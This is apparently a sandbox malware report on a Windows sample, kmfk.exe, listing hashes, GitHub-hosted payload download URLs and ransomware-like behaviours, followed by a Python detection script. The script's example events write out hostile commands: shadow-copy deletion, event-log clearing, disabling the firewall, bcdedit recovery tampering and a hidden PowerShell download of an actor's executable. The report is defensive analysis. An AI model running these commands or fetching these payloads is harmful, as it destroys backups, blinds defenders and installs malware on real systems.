General

Target: kmfk.exe
Size: 5.2MB
Sample: 240502-nmnkbsaa59
MD5: 7b94d09d7a163ea69ac507a86c1c69e8
SHA1: 1fef4329b5a9ca9a037e9b1f7715f020dc955f40
SHA256: c690a152cb4f33da1c1d408089460cbccdf3dff520f2a93d403f15af6df6cc8f
SHA512: 1027b042f70ef0dcff83af0a07ce4e72b835ba62d2ae9d3a6d6578ba306689017e1b4065b160ed295273e8311cb5ade4789db8deaec1da65c3b832a3c8debedb
SSDEEP: 49152:MFtkoue3u4BfCwyls7ZRqTHquk3OcIA5EuLg0UC0GSJVnS7dErDb:M3jH+40wjqTHqJEQbgVSCDb
Tasks

Static task: static1
Behavioral task: behavioral1 (sample kmfk.exe; resource win7-20240215-it)
Behavioral task: behavioral2 (sample kmfk.exe; resource win10v2004-20240419-it)
Malware Config

Extracted download URLs (all served from GitHub; the third points at a public build of Rubeus, a Kerberos abuse tool from the GhostPack collection, rather than an actor-controlled repository):
- https://github.com/anebgqa/d/releases/download/d/mz.exe
- https://github.com/anebgqa/c/releases/download/c/ps.exe
- https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
- https://github.com/anebgqa/e/releases/download/e/kln.exe
Targets

Target: kmfk.exe (5.2MB; MD5, SHA1, SHA256, SHA512 and SSDEEP as listed under General above)
Signatures:
- Clears Windows event logs
- Deletes shadow copies (ransomware often targets backup files to inhibit system recovery)
- Modifies boot configuration data using bcdedit
- Mimikatz (mimikatz is an open source tool to dump credentials on Windows)
- Blocklisted process makes network request
- Downloads MZ/PE file
- Modifies Windows Firewall
- Executes dropped EXE
- Drops desktop.ini file(s)
- Legitimate hosting services abused for malware hosting/C2
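The signatures above are what the sandbox fired on; for a defender the same behaviours are most useful as process-creation detections. The following is an added example, not code from the Triage report or from the sample: it runs command-line rules for the event-log clearing, shadow-copy deletion, bcdedit recovery tampering, firewall changes and PowerShell-driven EXE download listed above, and flags downloads from the extracted GitHub URLs as abuse of a legitimate hosting service. The events in SAMPLE_EVENTS are constructed to resemble Windows Security 4688 / Sysmon Event ID 1 command lines and are not from this run; the regexes and the HOSTING_SERVICES host list are assumptions about how these behaviours typically appear, not the sandbox's own signature definitions. Note that 4688 only carries the command line when "Include command line in process creation events" is enabled.

```python
"""Detection rules for the behaviours listed in the report, run over constructed
process-creation events. Added example; not from the report or the sample."""
import re
from urllib.parse import urlparse

# Rules keyed by the signature name used in the report. Each regex is an assumed
# command-line pattern for that behaviour, not the sandbox's own definition.
RULES = [
    ("Clears Windows event logs",
     re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b", re.I)),
    ("Deletes shadow copies",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b"
                r"|\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("Modifies boot configuration data using bcdedit",
     re.compile(r"\bbcdedit(?:\.exe)?\s+/set\b.*?\b(?:recoveryenabled\s+no"
                r"|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("Modifies Windows Firewall",
     re.compile(r"\bnetsh(?:\.exe)?\s+(?:advfirewall|firewall)\s+"
                r"(?:set|firewall\s+add|add)\b", re.I)),
    ("Downloads MZ/PE file",
     re.compile(r"(?:Invoke-WebRequest|\biwr\b|DownloadFile|Start-BitsTransfer"
                r"|certutil(?:\.exe)?\s+-urlcache).*?https?://\S+\.exe\b", re.I)),
]

# Download URLs extracted from the sample's config (copied from the report).
EXTRACTED_URLS = [
    "https://github.com/anebgqa/d/releases/download/d/mz.exe",
    "https://github.com/anebgqa/c/releases/download/c/ps.exe",
    "https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe",
    "https://github.com/anebgqa/e/releases/download/e/kln.exe",
]

# Hosts treated as "legitimate hosting services" (assumed list for this example).
HOSTING_SERVICES = {"github.com", "raw.githubusercontent.com",
                    "objects.githubusercontent.com"}

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def match_rules(cmdline):
    """Return the report signature names whose pattern matches this command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def extract_urls(text):
    """Pull http(s) URLs out of a command line, dropping trailing punctuation."""
    return [u.rstrip(".,;)") for u in URL_RE.findall(text)]


def hosted_on_legit_service(url):
    """True when the URL's host is one of the hosting services we track."""
    host = (urlparse(url).hostname or "").lower()
    return host in HOSTING_SERVICES


def scan(events):
    """Map pid -> list of signature names for every event that triggers a rule."""
    hits = {}
    for ev in events:
        names = match_rules(ev["cmdline"])
        if any(hosted_on_legit_service(u) for u in extract_urls(ev["cmdline"])):
            names.append("Legitimate hosting services abused for malware hosting/C2")
        if names:
            hits[ev["pid"]] = names
    return hits


# Constructed events (not from the sandbox run): five that should fire, one benign.
SAMPLE_EVENTS = [
    {"pid": 1201, "cmdline": "cmd.exe /c vssadmin delete shadows /all /quiet"},
    {"pid": 1202, "cmdline": "bcdedit /set {default} recoveryenabled No"},
    {"pid": 1203, "cmdline": "wevtutil.exe cl Security"},
    {"pid": 1204, "cmdline": "netsh advfirewall set allprofiles state off"},
    {"pid": 1205, "cmdline": 'powershell -nop -w hidden -c "Invoke-WebRequest '
                             'https://github.com/anebgqa/d/releases/download/d/mz.exe '
                             '-OutFile C:\\Users\\Public\\mz.exe"'},
    {"pid": 1206, "cmdline": "notepad.exe C:\\Users\\Public\\readme.txt"},
]

if __name__ == "__main__":
    for pid, names in scan(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(names))
```

The hosting-service check is deliberately separate from the download rule: a `releases/download` URL on github.com is not malicious by itself, so the two hits together (download of an EXE plus a trusted host) are what justify the "legitimate hosting abused" classification rather than either alone.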
MITRE ATT&CK Enterprise v15

Execution
- Command and Scripting Interpreter: 1 (PowerShell: 1)
- Windows Management Instrumentation: 1